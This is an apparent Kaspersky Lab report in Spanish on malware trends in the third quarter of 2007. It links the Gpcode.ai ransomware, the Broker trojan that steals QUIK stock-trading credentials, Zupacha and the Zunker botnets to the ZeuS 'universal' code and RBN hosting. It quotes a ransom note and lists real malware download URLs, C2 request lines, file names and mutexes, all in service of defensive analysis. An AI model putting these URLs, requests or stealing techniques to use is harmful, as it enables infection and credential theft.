Informes sobre malware

Desarrollo de las amenazas informáticas en el tercer trimestre de 2007

El tercer semestre de 2007 resultó ser mucho menos intenso en acontecimientos de lo que nosotros esperábamos. No quiero decir, por supuesto, que los programas nocivos hayan dejado de existir o que todos los escritores de virus se hayan convertido en ciudadanos ejemplares, sino que las dimensiones de los acontecimientos fueron mucho menores que en los años y meses anteriores.

A aquellos que recuerdan los tiempos de las epidemias globales de Mydoom y Lovesan, el actual incesante flujo de programas troyanos casi idénticos que invade Internet les parece bastante aburrido: a primera vista, las actividades de los delincuentes carecen de magnitud y novedad. Pero esto tiene una sencilla explicación: la delincuencia se ha tornado asunto de profesionales y por lo tanto, trata de no llamar la atención. Cualquier alboroto que causen las epidemias virales provocará, inevitablemente, que las fuerzas del orden empiecen a investigarlas. Llamar poco la atención y ser de “bajo perfil” son los principios fundamentales de los que están “del otro lado de las barricadas”. Además, son escasas las grandes innovaciones técnicas en este entorno. Desde hace mucho tiempo existen mecanismos comprobados de trabajo; tanto de los grupos delincuentes, como de las tecnologías que usan.

Pero a veces, el deseo de ganar la mayor cantidad de dinero posible, en otras palabras, la elemental avaricia, multiplicada por el bajo nivel técnico de los autores de programas nocivos es el eslabón más débil en sus esquemas. Es entonces cuando la “guerra invisible” se descubre a sí misma iluminada por los reflectores de los medios de comunicación masiva y se hace conocer a un amplio público.

¿Qué eventos del tercer semestre de 2007 quedarán impresos en nuestra memoria en la historia de esta “guerra”? Los incidentes relacionados al robo de datos de los usuarios. También la aparición de un troyano-extorsionador más. Recordaremos además la histeria masiva causada por la red Russian Business Network (RBN), un hosting “a prueba de balas” que en un instante se convirtió en “residencia del mal” y “semillero de todos los ataques de hacker en el mundo” ante los ojos de los usuarios comunes y corrientes.

Sobre este telón pasaron inadvertidas las noticias sobre las crecientes redes zombi vinculadas con el gusano Zhelatin (Storm Worm). Ni siquiera las estrepitosas declaraciones de que la “tormentosa red zombi” había rebasado el límite de los dos millones de equipos infectados lograron llamar la atención debida. Ser silencioso y pasar inadvertido ¿lo recuerda usted?

La verdadera batalla estaba ocurriendo en otro nivel de confrontación, no cubierta por los medios de comunicación.

Algunos de los sucesos del tercer trimestre que tuvieron resonancia en la prensa nos llamaron mucho la atención. Nos sorprendió que al empezar a investigar un incidente, sus huellas nos llevaran a otros que acababan de comenzar y que a primera vista no tenían ninguna relación con los demás.

Este informe trimestral será algo fuera de lo común. Lo hemos escrito según los resultados de una investigación de gran envergadura y no solo cubre todos los sucesos interesantes del trimestre, sino que también muestra con exactitud los temas que nos vemos obligados a enfrentar y expresa cuál es el trabajo de un experto antivirus.

El regreso del “cifrador”

Hacía más de un año que no teníamos noticias de los troyanos-cifradores. La historia del año pasado, cuando las compañías antivirus luchaban contra Gpcode (que usaba el algoritmo RSA para cifrar los datos), la analizamos en detalle en nuestro artículo “El chantaje cibernético”, donde pronosticamos que en el futuro aumentaría la cantidad de programas similares. Sin embargo, el “regreso del cifrador” tuvo lugar sólo a mediados de julio de 2007, casi un año después.

Empezando desde aproximadamente el 13 de julio, algunos usuarios empezaron a descubrir que sus documentos, fotografías, archivos y ficheros de trabajo se habían corrompido y convertido en “basura digital”, y en el sistema aparecieron ficheros con el nombre read_me.txt. El contenido de estos ficheros era, para nuestro pesar, conocido:

Hola, tus ficheros están cifrados con el algoritmo RSA-4096 (http://es.wikipedia.org/wiki/RSA)
Sin nuestro software, necesitarás varios años para descifrarlos. Toda tu información privada de los últimos 3 meses ha sido recolectada y enviada a nuestra dirección.
Para descifrar tus ficheros, tendrás que comprar nuestro software. El precio es $300.
Para comprar nuestro software, escríbenos a: xxxxx@xxxx.com y envíanos tu código personal -XXXXX. Después de que la compra haya sida realizada, te enviaremos una herramienta de descifrado y tu información privada será eliminada de nuestro sistema.
Si no te pones en contacto con nosotros hasta el 15/07/2007, tu información privada será publicada y perderás todos tus datos.
Glamorous team

¿Estamos ante el regreso del desconocido chantajista? La dirección de correo electrónico indicada en el texto ya era una señal para los analistas de virus de Kaspersky Lab: se encontraba también en algunas de las variantes de los programas troyanos LdPinch y Banker. Estos troyanos tenían claros indicios de haber sido creados en Rusia.

El análisis de los ficheros cifrados realizado por nuestros especialistas mostró que, a pesar de la información presentada en la carta, los autores habían usado una modificación del algoritmo RC4 en vez del mencionado RSA-4096, lo que nos hizo mucho más fácil resolver el problema. Al término de 24 horas desde el momento en que el troyano-chantajista fuese descubierto, fuimos capaces de averiguar el código de cifrado y publicar en nuestras bases antivirus los procedimientos de descifrado de los ficheros de los usuarios.

Durante el análisis de la nueva versión de Gpcode(analysis?pubid=188965655) quedó claro que este programa nocivo podría tener otras funciones. Además del cifrado, Gpcode tendría la potencialidad de robar datos personales del equipo infectado, enviarlos al servidor de los delincuentes y descargar ciertos ficheros desde este servidor.

Con la plena comprensión del peligro que representan los troyanos-cifradores, decidimos analizar con más profundidad el nuevo programa nocivo llamado Gpcode.ai. Y resultó que no era vano nuestro interés.

Tras las huellas de Gpcode.ai

Para nuestras investigaciones escogimos tres direcciones fundamentales:

  1. el servidor adonde el troyano enviaba los datos y desde donde descargaba los ficheros (http://martin-golf.net);
  2. las direcciones de correo electrónico puestas por los delincuentes en los textos dejados en los sistemas infectados;
  3. la línea de texto ubicada en el cuerpo del troyano, _SYSTEM_64AD0625_ (renglón-identificador que el troyano crea para permitir identificar su presencia en la memoria del ordenador).

Servidor

Descubrimos que Gpcode.ai se conecta al servidor por medio de un script ubicado en el servidor, s.php. Además, descargaba desde el servidor el archivo cfg.bin, que es una serie cifrada de instrucciones sobre qué información hay que reunir en los ordenadores (cuentas de acceso a diferentes sistemas bancarios y de pago).

Este análisis también lo realizaban muchas otras compañías antivirus al mismo tiempo que nosotros. Los primeros en tocar la alarma fueron los representantes de PrevX, que descubrieron en el servidor de los delincuentes archivos de 494 ordenadores infectados y declararon en voz alta que había varias grandes corporaciones entre las víctimas. El director general de PrevX, Mel Morris hasta mencionó los nombres de algunas: American Airlines, Booz Allen Hamilton y el Departamento de Estado de los EEUU. Ninguna de las “víctimas anunciadas” comentó la declaración de Morris.

Los representantes de varias otras compañías antivirus tomaron con cierto recelo las declaraciones de PrevX. David Parry de Trend Micro dijo que desde el punto de vista de la ética, estaba preocupado por la celeridad con que PrevX hizo públicos estos datos. Mientras que las grandes compañías antivirus trataban de evitar la publicación de cualquier coordenada (direcciones de servidores y correo electrónico) de los delincuentes, haciéndolas desaparecer de sus descripciones del troyano (aunque a veces resultara gracioso el resultado, como ya lo hemos escrito en nuestro weblog(http://www.viruslist.com/sp/weblog?discuss=208187400&return=1)), PrevX le mostró y contó a todo el mundo dónde estaban los datos privados y a quién le pertenecían.

Más tarde comenzó una verdadera invasión al sitio martin-golf.net. Los expertos de seguridad, los

hackers, los representantes de las fuerzas de seguridad de muchos países y simples curiosos invadieron el sitio de los delincuentes. Cualquier investigación de este incidente era ya imposible: los delincuentes ya sabían que los estaban observando.

Así, nuestra investigación no tenía ningún futuro si seguíamos este camino. Y pasamos a analizar el correo electrónico.

Correo electrónico

Nos interesaba cómo se comunicaba el delincuente con las víctimas que habían decidido pagar para recuperar sus datos. Por eso enviamos una carta a una de las direcciones indicadas en el programa troyano. Más o menos así: “Soy John Brown, un simple empleado y mis datos fueron cifrados. Los necesito para un informe urgente y mi jefe me matará si no lo hago. Al día siguiente los delincuentes respondieron.

Disculpe mi retraso.

Por favor gire 500 dólares a la cuenta 4616329 de e-gold y envíenos un mensaje a oxyglamour@gmail.com. Usted puede comprar e-gold con paypal en el sitio de cambio indicado en la página oficial de e-gold (http://www.e- gold.com/unsecure/links.htm#marketmaker).

Después le enviaremos de inmediato su programa personal de descodificación.

En la carta vemos que los autores de Gpcode.ai pedían 500 en vez de los 300 mencionados en el mensaje dejado por el troyano. Para enviar el dinero pedían usar el sistema favorito de los delincuentes cibernéticos, e-gold. Se indicaba el número de cuenta para el envío de dinero.

El correo electrónico ya no nos podía decir nada más.

El texto “_SYSTEM_64AD0625_”

Lo único que nos quedaba era establecer qué otros programas nocivos podría haber creado el grupo autodenominado “Glamorous team”. Y empezamos a buscar el texto “_SYSTEM_64AD0625_” en nuestra colección de virus.

El resultado fue bastante inesperado. Este identificador estaba presente en programas troyanos muy diversos. Estaba en troyanos-descargadores, espías y puertas traseras.

Lo que identifica estas muestras de virus es que el nombre del archivo que los programas nocivos usaron para instalarse en el sistema: ntos.exe, es el mismo que en el caso Gpcode.ai. Además, contenían archivos con los nombres sporder.dll y rsvp322.dll, creaban en el catálogo de Windows un sub-catálogo wsnpoem con archivos audio.dll y video.dll.

El análisis detallado de archivos mostró que coincidían no solo en el nombre del segmento sino también en más del 80% del código.

El código “universal”

De hecho, estábamos ante un código “universal”. Sus funciones sirven para robar datos y cargar nuevos troyanos en el sistema, puede ejecutar el arranque o boot y conectar el ordenador a una red zombi.

Los programas nocivos creados sobre la base del código “universal tienen un componente común y pocas funciones (comparadas con el tamaño total del archivo), que cambian en las diferentes variantes del programa. Es curioso que en el año 2006 ya hubiéramos encontrado algunos de estos programas. Este código “universal” se usó para crear el “cifrador” Gpcode.ai.

Hemos complementado nuestro esquema de investigación con nuevas registros y dependencias entre programas.

Las malas compañías

La siguiente etapa de nuestra investigación fue el análisis de las páginas de referencia que estaban en las muestras que encontramos del código “universal”. Tomamos el archivo más reciente que encontramos y extrajimos del mismo los cuatro enlaces que usó el programa nocivo durante su periodo de funcionamiento:

http://81.95.149.28/logo/zeus.exe
http://81.95.149.28/logo/zupa.exe
http://myscreensavers.info/zupa.exe
http:/81.95.149.28/logo/fout.php

¿Qué hacía este troyano? Se instalaba como ntos.exe, luego cargaba los archivos zeus.exe (http://81.95.149.28/logo/zeus.exe) y zupa.exe (http://81.95.149.28/logo/zupa.exe), se conectaba con el script fout.php (http:/81.95.149.28/logo/fout.php) para identificarse en la red zombi. El troyano descargaba los archivos con la configuración cifrada en cfg.bin. En este archivo había mensajes de texto y enlaces a otros sitios. El programa nocivo controlaba la actividad del usuario en Internet y durante sus visitas a foros y blogs colocaba (desde cfg.bin) sus propios textos que contenían la página de referencia nociva (http://myscreensavers.info/zupa.exe) al final de los mensajes del usuario.


Ejemplo de un mensaje nocivo

Encontramos una gran cantidad de ejemplos similares mediante Google:

Esta táctica de ataque permite que los autores de troyanos usen a los usuarios de ordenadores infectados para difundir nuevos tipos de programas nocivos y así aumentar el número de ordenadores infectados. Este es un claro ejemplo de cómo los criminales informáticos han dejado atrás el envío de sus programas nocivos a través del correo electrónico y usan la tecnología moderna de Internet para este fin.

¿Qué programas nocivos difundía el troyano que estábamos investigando? La respuesta a esta pregunta es impresionante:

enlace Programa nocivo descargado
http://81.95.149.28/logo/zeus.exe Trojan-Spy.Win32.Bancos.aam
http://81.95.149.28/logo/zupa.exe Email-Worm.Win32.Warezov.dq
http://myscreensavers.info/zupa.exe Trojan-Spy.Win32.Bzub.bm

Eran programas que pertenecían a grupos nocivos totalmente diferentes que a primera a vista no tenían nada en común y como se suponía, pertenecían a diferentes creadores de virus, pero que se difundían desde un mismo sitio con el mismo troyano-descargador. ¡Y todos estaban relacionados con el cifrador Gpcode.ai!

La situación era confusa, ya que llevaba a pensar que había cierto sindicato mundial que estaba involucrado en la mayoría de los programas nocivos y en las últimas epidemias.

Nuestras sospechas crecieron cuando analizamos el boonet que se creó con la ayuda de Bzub. Resultó que el “pariente cercano” de Bzub era un troyano llamado «Zupacha». Bzub y Zupacha son casi idénticos, pero Bzub está equipado con un troyano espía en cambio Zupacha no lo está.

Bzub/Zupacha es un cliente de redes zombi que funciona bajo la dirección del sistema bootnet Zunker.

Otro programa nocivo con una peculiar interfaz de conexión a la red zombi Zunker era Email-Worm.Win32.Zhelatin.bg. Era uno de los famosos gusanos StormWorm que a principios de 2007 llenaron el correo electrónico, usando sutiles tácticas de ingeniería social para difundirse.

De esta manera Zhelatin, Warezov, Bancos.aam, Bzub, y ahora Gpcode.ai estaban relacionados de alguna manera. Todos estos programas pertenecen a las familias más activas y peligrosas de los nocivos: Los analistas de virus de todo el mundo conocen muy bien los archivos con los nombres ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92620748.exe, zeus.exe, zs1.exe

Tirando del hilo, desenredamos una gran cantidad de conexiones.

Mientras realizábamos nuestra búsqueda, los malhechores desconocidos se manifestaron de nuevo. Mejor dicho, los malhechores no querían llamar la atención, sin embargo lo que ocurrió fue bastante curioso.

Broker

El 25 de julio de 2007 (diez días después de la aparición de Gpcode.ai) los expertos del “Laboratorio Kaspersky” descubrieron la propagación de un nuevo programa nocivo. Se infectaban los visitantes de los sitios rusos de información más populares utro.ru, gzt.ru, rbc.ru.

Durante las investigaciones se estableció que en todos los casos desde el sistema de banner Utro.ru se ejecutaba un enlace a (http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN), que contenía como banner el enlace al sitio nocivo (http://81.95.145.210/333/m00333/index.php), el que a su vez estaba en el tristemente famoso hosting RBN (Russian Bussiness Network).

Al abrir esta página una serie de exploits (se usaba el popular sistema MPack) atacaban el navegador del usuario. Si el ataque era exitoso en el sistema aparecía un troyano-descargador. Éste a su vez instalaba el principal programa nocivo, Trojan- Spy.Win32.Bancos.aam.

Después de la instalación en el sistema, el troyano comenzaba a ejecutar las siguientes instrucciones:

%WinDir%short.com 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0

Como resultado de estas acciones en el sistema del usuario infectado aparecía un archivo con el nombre que los analistas de virus ya conocían, ntos.exe: este mismo nombre se usaba durante la instalación de Gpcode.ai en el sistema. Esperando lo peor del nuevo “cifrador” empezamos un análisis detallado del archivo.

Resultó que no era Gpcode. El nuevo Bancos.aam se convirtió en el primer troyano espía cifrado, orientado al robo de datos de los usuarios del sistema QUIK.

QUIK es un conjunto de programas que sirven para organizar el acceso a los sistemas en línea de la bolsa de comercio. La transacción de valores a través de Internet se llama Internet-trading. QUIK consta de un servidor y de puestos de trabajo (terminales) del cliente que interactúan entre sí a través de Internet.

No habíamos notado antes que los creadores de virus se esforzaran tanto para obtener el acceso a los sistemas de la bolsa de comercio. Hace mucho ya lo hacían para acceder a las cuentas de los sistemas bancarios. Pero al comercio de la bolsa, no.

El troyano buscaba en el sistema los archivos con los nombres secring.txk, pubring.txk, qrypto.cfg, en los que se guarda la información sobre los parámetros de acceso a QUIK par luego re-enviar estos archivos a su propio servidor.

Sabiendo qué archivos buscaba el espía, empezamos a buscar de nuevo en la colección de programas nocivos. Encontramos cinco tipos más de este troyano, el primero de todos tenía fecha de principios de julio. Más tarde, salieron de la clase Bancos.aam y se los clasificó en una nueva familia, Trojan-PSW.Win32.Broker.

Está demás mencionar que estos troyanos por su código se parecían como hermanos a Gpcode.ai La diferencia estaba solo en que uno robaba los datos y el otro los cifraba. De nuevo nos encontramos frente al mismo código “universal”.

Conclusiones parciales

Los hechos con los que contábamos a principios de agosto eran:

  • Gpcode.ai se basaba en el código “universal” e interactuaba con el sitio martin-golf.net.
  • Bancos.aam se creó con el código “universal” y se descargaba desde los servidores situados en hosting “a prueba de balas” RBN (Russian Bussiness Network).
  • Algunas redes zombi Zunker que habíamos encontrado antes también estaban basados en los recursos de RBN.
  • Las redes zombi Zunker son centros de dirección para los downloaders (descargadores) que bajaban Bancos.aamGpcode.ai y otros programas nocivos parecidos.
  • Dentro de los programas nocivos que también se pueden dirigir con la ayuda de Zunker, están: Zupacha, el espía Bzub, posiblemente el gusano Zhelatin (Store Word)
  • Una de estas redes zombi se usó para difundir el gusano Wazerov.

Lo único que faltaba saber era quién era el autor del código “universal” que se usaba tan a menudo para crear tantos diferentes programas nocivos y si todos estos incidentes no habían sido el resultado de un mismo grupo de creadores de virus.

Tuvimos que leer con atención diferentes sitios y foros de hackers, sobre todo en ruso. La situación comenzó a esclarecerse.

En búsqueda del “código universal”

Zunker y Zupacha

Entonces… ¿con qué fenómeno habíamos estado tratando todo este tiempo? En los sitios de hackers se vendía como pan caliente el dúo Zunker+Zupacha, es decir, el centro de administración y el cliente de la red zombi. Esto ya lo sabíamos. Un descubrimiento interesante era el precio que pedían los desconocidos autores del sistema bot por este “juego”: llegaba hasta los 3.000 dólares. A veces se podían encontrar propuestas de comprar esta “dulce pareja” por un precio mucho menor, cerca de 200 dólares, posiblemente hechas por los propietarios del código fuente del dúo troyano.

Pero para nosotros no fue nada difícil obtener todos los archivos de Zunker y Zupacha que nos interesaban sin pagar un centavo, gracias a Google y a que sabíamos las direcciones de algunasredes zombi que ya estaban en funcionamiento.

La lista completa de funciones de Zupacha resultó ser impresionante. Además de descargar otros ficheros al sistema, su tarea principal era seguir propagándose. Ya hemos escrito más arriba sobre uno de los métodos (insertar sus textos en los mensajes de los foros). Estas eran las formas que Zupacha usaba para hacer envíos masivos de sus enlaces:

  • Envíos de spam por ICQJabber. Los textos que contenían los enlaces a los sitios nocivos se agregaban a todos los mensajes que el usuario enviaba o recibía de sus contactos en estos sistemas de mensajería instantánea.
    Envíos de spam por la Web. Los textos se agregan a todos los formularios web que el usuario llenaba. Como regla, eran de los foros y las interfaces web de los sistemas de correo.

  • Servidor de correo. Los textos se agregan a las cartas de los usuarios.

Es necesario remarcar que en todos estos casos Zupacha no inicia por su propia cuenta el envío masivo por todos los métodos descritos. Zupacha sólo controla las actividades del usuario y agrega sus textos a todos los mensajes salientes, de tal forma que el usuario ni siquiera se da cuenta. Este truco está destinado a demorar el proceso de detección de la infección.

Pero Zupacha no roba datos, es sólo un troyano-descargador cuya principal función es reproducirse. Por lo tanto, no podía funcionar como el mentado “código universal”.

El posterior análisis de las propuestas de los hackers nos dio la respuesta a nuestra pregunta: el “código universal” que se usaba en cientos de variantes de Bancos.aam, Gpcode.ai y Broker resultó ser el de la red zombi ZeuS (nombre dado por el autor del código).

ZeuS – Zbot

La información que teníamos en nuestro poder sobre las modificaciones de ZeuS y las investigaciones que hicimos en Internet nos permitieron hacernos una idea casi completa del fenómeno ante el cual nos encontrábamos.

Empezaremos por decir que la red zombi en un principio estaba destinada para venderla a cualquier postor y configurarla para satisfacer las necesidades del cliente. El autor no se encargaba de la “asistencia técnica” y había encargado esta tarea a otras personas. Después de las estruendosas historias de Gpcode.ai y Broker, parece que el autor decidió que su criatura había llamado demasiado la atención de las fuerzas de seguridad y declaró en uno de los sitios que abandonaba las ventas.

Esta historia es muy parecida a los sucesos de fines del año pasado, cuando los incidentes del robo de los datos del banco Nordea sacaron a flote a un troyano de funciones similares, Nuclear Grabber (que en su tiempo se vendía por 3.000 dólares) y su autor Corpse hasta llegó a dar una entrevista a un periodista. Luego, Corpse anunció en su sitio que “dejaría los negocios”, que “todos los códigos fuente se habían perdido al quemarse el disco duro” y que nunca más se dedicaría a crear y brindar asistencia técnica a los programas nocivos.

En el caso de ZeuS todo siguió un escenario parecido. A pesar de que desde principios de julio su autor también había “dejado los negocios”, en el entorno de los hackers quedó un constructor que permitía crear nuevas variantes de la red zombi con funciones asignadas. Varios grupos empezaron a hacer competencia para vender y difundir esta red.

En un principio, ZeuS tenía funciones zombi muy limitadas: sólo podía descargar otros ficheros al sistema. Con el tiempo estas funciones aumentaron. No sabemos si esto fue gracias al autor o si las nuevas funciones las agregaron los nuevos “propietarios” del código fuente. La novedad más importante fue la aparición en ZeuS de una interfaz universal, que le permitía conectarse a la red Zunker de la misma manera que Zupacha, aceptar instrucciones mediante el fichero cfg.bin y ejecutarlas “sobre la marcha”.

Nuestra compañía creó un programa capaz de descifrar algunos de los ficheros cfg.bin. Dentro de éstos había direcciones de varios bancos y sistemas de pago. Los propietarios de la red zombi podían agregar en cualquier momento direcciones de nuevos y nuevos objetivos para vigilar las actividades del usuario y recolectar datos.

Entre las funciones de la red zombi, además de los procedimientos normales de instalarse en el sistema, inyectarse en los procesos activos, luchar contra algunos antivirus, la presencia de servidores socks, http y proxy, hay un potente procedimiento de robo de información:

  • El troyano roba el contenido del Almacén Protegido (Protected Storage) dónde se encuentran las contraseñas del usuario.
  • Un grabber de formularios. El troyano intercepta todos los datos que el usuario ponga en los formularios mediante el navegador de Internet. La lista de direcciones controladas de las cuales se debe interceptar la información suele ser de bancos y sistemas de pago. De esta manera, se roba las cuentas.
  • Se eluden los teclados virtuales. El troyano intercepta las pulsaciones del ratón y hace capturas de pantalla en esos momentos.
  • Suplantación de sitios y páginas. Este es un método muy interesante, usado en el pasado por Nuclear Grabber. Cuando el usuario trata de comunicarse con alguno de los sitios de la lista de intercepción del troyano, sucede una de dos cosas: o se remite al usuario a un sitio phishing o se agrega a la página original del sitio un nuevo campo de introducción de datos. El contenido de la página se suplanta en el ordenador del usuario ¡antes de ser reflejada en el navegador de Internet! (íóæíû ñêðèíøîòû)
  • Robo de certificados.

El rasgo distintivo que nos permitió encontrar sin demora las variantes de ZeuS en nuestra colección es el renglón-identificador (mutex) que el troyano crea para identificar su presencia en la memoria del equipo _SYSTEM_.

Por ejemplo:

__SYSTEM__91C38905__
__SYSTEM__64AD0625__
__SYSTEM__23D80F10__
__SYSTEM__7F4523E5__
__SYSTEM__45A2F601__

Gracias a esto nos fue posible clasificar todas las variantes de ZeuS en familias independientes con un nombre común, Zbot.

He aquí un código de verdad “universal”, que roba cualquier información por medio de una gran cantidad de originales métodos. Y lo más peligroso es que se puede introducir nuevas funciones a cada modificación, como sucedió con Gpcode.ai.

Las tres “Z”

Ahora todo vuelve a estar en su lugar. De hecho, en el sector ruso de los delincuentes informáticos se perfila cierto estándar que consiste en el dúo Zupacha+ZeuS y la red zombi que éste controla.

Las dimensiones de las redes zombi construidas a partir de este conjunto son impresionantes. Una de las grandes redes creadas sobre Zunker constaba de 106.000 ordenadores en el momento de su detección y el ritmo de crecimiento era de 1.500 ordenadores cada día. La efectividad de la propagación de Zupacha estaba condicionada porque la configuración y el centro de administración son muy fáciles de usar.

Cualquier delincuente, principiantes incluidos, podía comprar estos dos troyanos (ZeuS y Zupacha), configurados ad-hoc para cada cliente en concreto. A continuación, necesitaba arrendar un servidor e instalarle el panel de control de la red zombi, Zunker. Como era de esperar, en muchos casos eligieron la conocida Russian Bussiness Network, que en el transcurso de medio año viene apareciendo en las noticias y ha adquirido la fama de “residencia del mal” en el mundo occidental.

Pero a nosotros no nos interesaba tanto la RBN, como sus clientes y las redes zombi que utilizaban. Como sabíamos qué y dónde buscar, nos fue fácil descubrir varios de estos sistemas (ver las figuras más arriba).

Se puede afirmar con toda seguridad que algunas de estas redes zombi Zunker participaban en la propagación de peligrosos programas como el “gusano tempestuoso” Zhelatin y Warezov. Es posible que los mismos autores crearan estas redes zombi basadas en Zunker+Zupacha, o también que “arrendaran” redes zombi ya existentes, pagándoles a los propietarios por ayudarles a propagar sus gusanos.

Es curioso que cuando el troyano Zupacha cayó en manos de los hackers del mundo occidental, les causó gran impresión el concepto y lo empezaron a analizar en los foros (http://www.ryan1918.com). Aprendieron a cambiar la dirección del centro de administración en el fichero binario del troyano, para usarlo sin tener los códigos fuente. También trataron de hacer por su cuenta un centro de administración, incluyendo la base de datos que contenía la configuración del troyano. Más tarde, uno de ellos encontró el código del centro de administración y la estructura de la base de datos y las cosas empezaron a ir más rápido. Todos los involucrados en este asunto (el análisis del troyano ruso y el uso del “arma de la mafia rusa” participaron en el desarrollo, propagación y popularización de Zupacha.

Conclusión

Toda la información expuesta ilustra la forma de funcionamiento e interrelaciones del mundo de la delincuencia cibernética, en su mayor parte de habla rusa. Determinados autores y grupos crean troyanos para venderlos. Los compradores los configuran según sus propias necesidades, a veces haciéndolos irreconocibles. Los equipos infectados se organizan en redes zombi de hasta cientos de miles de ordenadores infectados y se administran con la ayuda de centros de control escritos por otros delincuentes, los cuales también están en venta libre. Las mismas redes zombi pueden usarse para difundir los más variados programas nocivos, que a veces compiten los unos con los otros. Para que todo esto funcione el mayor tiempo posible, a pesar de los esfuerzos de las agencias de seguridad y las compañías antivirus, existen servicios de hosting especiales “a prueba de balas”, que ofrecen sus servicios a diferentes precios, que varían desde unas cuantas decenas hasta miles de dólares mensuales.

Toda esta industria genera determinadas ganancias, ya que hay gran oferta y demanda de estos servicios de creación y difusión de troyanos. Nosotros hemos mostrado sólo una parte insignificante del iceberg, la que respecta a los grupos de hackers de habla rusa. Es evidente que en el mundo existen otras agrupaciones: sudamericanas, chinas, turcas y muchas otras, cada una de las cuales tiene sus peculiaridades, pero que son similares en general. No hay fronteras en Internet.

Un ejemplo más de todo lo expuesto es la noticia del 17 de agosto de 2007 (http://www.informationweek.com/news/showArticle.jhtml?articleID=201800958), que citaré en su totalidad:

Security researchers have unearthed the single largest cache of stolen identities, thanks in part to a Trojan stealing the data that has been hidden in a fraudulent advertisement on online job sites like Monster.com.
Don Jackson, a researcher with security company SecureWorks, told InformationWeek that he found 12 data caches connected to one group using the latest variance of the Prg Trojan, which also is known as Ntos, Tcp Trojan, Zeus, Infostealer.Monstres, and Banker.aam. Several of the 12 found caches contain information on about 4,000 to 6,000 identity theft victims, but one contains about 10,000 and the largest one contains 46,000.
He estimates that between the 12 caches, there probably is information on about 100,000 stolen identities.

Usted ya se habrá dado cuenta de qué troyano era éste, cómo robaba los datos y es posible que haya adivinado adónde los enviaba. Sí, este era el mismo “código universal” de ZeuS. Y enviaba los datos a RBN.

Desarrollo de las amenazas informáticas en el tercer trimestre de 2007

Su dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

 

Informes

BlindEagle vuela alto en LATAM

Kaspersky proporciona información sobre la actividad y los TTPs del APT BlindEagle. Grupo que apunta a organizaciones e individuos en Colombia, Ecuador, Chile, Panamá y otros países de América Latina.

MosaicRegressor: acechando en las sombras de UEFI

Encontramos una imagen de firmware de la UEFI infectada con un implante malicioso, es el objeto de esta investigación. Hasta donde sabemos, este es el segundo caso conocido en que se ha detectado un firmware malicioso de la UEFI usado por un actor de amenazas.

Suscríbete a nuestros correos electrónicos semanales

Las investigaciones más recientes en tu bandeja de entrada